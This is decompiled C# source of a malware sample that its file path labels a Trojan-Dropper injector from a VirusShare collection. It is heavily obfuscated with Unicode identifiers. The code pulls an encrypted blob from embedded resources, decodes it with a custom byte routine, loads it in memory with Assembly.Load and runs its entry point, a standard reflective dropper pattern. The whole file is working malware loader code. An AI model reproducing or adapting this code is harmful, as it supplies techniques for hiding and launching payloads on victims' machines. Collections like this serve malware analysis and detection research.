MalwareSourceCode/MSIL/Trojan-Dropper/Win32/I/Trojan-Dropper.Win32.Injector.acsv-43bbe26a7f41a161062d0c91d3d16a0fee497cd0605b1916485a06b4465092c1/ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎ.cs

// Decompiled with JetBrains decompiler
// Type: ǣƀƥǣǤӸƔƙƳǥƴƣƜƕơպƙȜƁƂƕƕҿǢƔƄռƋպֆƓƐȄƓƀƐƒռֆպȞӂƋǢƥƴƈƑȣƕƣǍƑƪƕȜƥƂփƓƎƓƜƲȜӸǣƀƙƏƑƴֆƎƄƴƅǢƕƜƁƜƂƉƂơƋƆǍƛ.ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƀպӂƄȮȜƜƛǣӂֆƂǥƴƴփȜƥƉֆƲǢƥƙƑǢռҧƐȞƂȄǤȞƥƙӸպȞƩƒȜơƥȣƏƙǍҿӸǭƙƘƕǍƖƂȣƘǎƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƣȮƓǎփƏƕƀƲƪƓƆƖƒռȮƆƛƂƁǢƒƕƜȞƔƣƲƁƩռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣƜȄƄƗȮƗƀֆƅƪƳҿơƲǢƙƂƣҿƪƈƩպƲƗƗӸҿƗǢƒƋƖƀǍƂƅƄֆƎȣƴƈƜƄǭռƣƙƔǍӂƓƄӂƳƗƋƄƉ
// Assembly: cryptbs, Version=2.6.12.79, Culture=neutral, PublicKeyToken=null
// MVID: FC627692-FCDB-4E6B-82E3-E24FD4825A81
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.acsv-43bbe26a7f41a161062d0c91d3d16a0fee497cd0605b1916485a06b4465092c1.exe

using System;
using System.Reflection;
using System.Resources;
using System.Text;
using System.Windows.Forms;

namespace ǣƀƥǣǤӸƔƙƳǥƴƣƜƕơպƙȜƁƂƕƕҿǢƔƄռƋպֆƓƐȄƓƀƐƒռֆպȞӂƋǢƥƴƈƑȣƕƣǍƑƪƕȜƥƂփƓƎƓƜƲȜӸǣƀƙƏƑƴֆƎƄƴƅǢƕƜƁƜƂƉƂơƋƆǍƛ
{
  internal class ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƀպӂƄȮȜƜƛǣӂֆƂǥƴƴփȜƥƉֆƲǢƥƙƑǢռҧƐȞƂȄǤȞƥƙӸպȞƩƒȜơƥȣƏƙǍҿӸǭƙƘƕǍƖƂȣƘǎƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƣȮƓǎփƏƕƀƲƪƓƆƖƒռȮƆƛƂƁǢƒƕƜȞƔƣƲƁƩռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣƜȄƄƗȮƗƀֆƅƪƳҿơƲǢƙƂƣҿƪƈƩպƲƗƗӸҿƗǢƒƋƖƀǍƂƅƄֆƎȣƴƈƜƄǭռƣƙƔǍӂƓƄӂƳƗƋƄƉ
  {
    public static ResourceManager պƑƥǍƣƉƙƉƒƲƐȮƴƜƈƘȄƛƐƉƱƍȄƱƏƋƣƜǍǥ = new ResourceManager("aeXA1kMRBuc3", Assembly.GetExecutingAssembly());

    private static void Main()
    {
      try
      {
        ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƀպӂƄȮȜƜƛǣӂֆƂǥƴƴփȜƥƉֆƲǢƥƙƑǢռҧƐȞƂȄǤȞƥƙӸպȞƩƒȜơƥȣƏƙǍҿӸǭƙƘƕǍƖƂȣƘǎƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƣȮƓǎփƏƕƀƲƪƓƆƖƒռȮƆƛƂƁǢƒƕƜȞƔƣƲƁƩռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣƜȄƄƗȮƗƀֆƅƪƳҿơƲǢƙƂƣҿƪƈƩպƲƗƗӸҿƗǢƒƋƖƀǍƂƅƄֆƎȣƴƈƜƄǭռƣƙƔǍӂƓƄӂƳƗƋƄƉ.ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƒռƓփƅƂƥƒȣƑֆƳȮƐơǥƩȞƅƛǍȜƍơƓҧƩƔӂƳƥƎƕƏƒƍƜǥƪƳǤƅƑƉǤփơȄƍǣƏƉƪƍƄƑƈǭƐƐ(Encoding.Default.GetBytes((string) ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƀպӂƄȮȜƜƛǣӂֆƂǥƴƴփȜƥƉֆƲǢƥƙƑǢռҧƐȞƂȄǤȞƥƙӸպȞƩƒȜơƥȣƏƙǍҿӸǭƙƘƕǍƖƂȣƘǎƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƣȮƓǎփƏƕƀƲƪƓƆƖƒռȮƆƛƂƁǢƒƕƜȞƔƣƲƁƩռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣƜȄƄƗȮƗƀֆƅƪƳҿơƲǢƙƂƣҿƪƈƩպƲƗƗӸҿƗǢƒƋƖƀǍƂƅƄֆƎȣƴƈƜƄǭռƣƙƔǍӂƓƄӂƳƗƋƄƉ.պƑƥǍƣƉƙƉƒƲƐȮƴƜƈƘȄƛƐƉƱƍȄƱƏƋƣƜǍǥ.GetObject("aQ8ZhGcxsG_zmxYWJVbiUyrnffY")));
      }
      catch (Exception ex)
      {
        int num = (int) MessageBox.Show(ex.ToString());
      }
    }

    public static void ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƒռƓփƅƂƥƒȣƑֆƳȮƐơǥƩȞƅƛǍȜƍơƓҧƩƔӂƳƥƎƕƏƒƍƜǥƪƳǤƅƑƉǤփơȄƍǣƏƉƪƍƄƑƈǭƐƐ(
      byte[] ƴƪƕփփƗƪƔƩǭȣǎҧƐƎƣƔƆƈƆƑǢƁƗƙӂơƈƕƄռƔӸƉƄƪƱƲȜƪƒǢȄƱǎǢƔƴƘǥƅƕƁƱƐƜǍƔƅƋ)
    {
      MethodInfo entryPoint = Assembly.Load(ƴƪƕփփƗƪƔƩǭȣǎҧƐƎƣƔƆƈƆƑǢƁƗƙӂơƈƕƄռƔӸƉƄƪƱƲȜƪƒǢȄƱǎǢƔƴƘǥƅƕƁƱƐƜǍƔƅƋ).EntryPoint;
      object[] parameters = (object[]) null;
      if (entryPoint.GetParameters().Length > 0)
        parameters = new object[1]
        {
          (object) new string[1]{ "1" }
        };
      entryPoint.Invoke((object) null, parameters);
    }

    public static byte[] ƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆȞƄƲƖƄƖƎӸƆƍǣǥƎӂƓƅƑƐǥƴȜȮƈǭƅǥƣӸƜƔҧǭƍƈǥռƀơƩӸǥȜƕƜƓƴȜƘȜȜƩǭǍƜպƥǣȮƱƆEn(
      byte[] ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ,
      string ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖ)
    {
      byte[] bytes = Encoding.ASCII.GetBytes(ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖ);
      int num = (int) ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ[ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ.Length - 1];
      byte[] numArray = new byte[ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ.Length - 1];
      short index1 = 0;
      for (int index2 = 0; index2 < ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ.Length - 1; ++index2)
      {
        if ((int) index1 >= bytes.Length)
          index1 = (short) 0;
        if (index2 < ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ.Length - 1)
        {
          numArray[index2] = Convert.ToByte((int) ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ[index2] - numArray.Length % bytes.Length - (int) bytes[(int) index1] + num);
          ++index1;
        }
      }
      return numArray;
    }
  }
}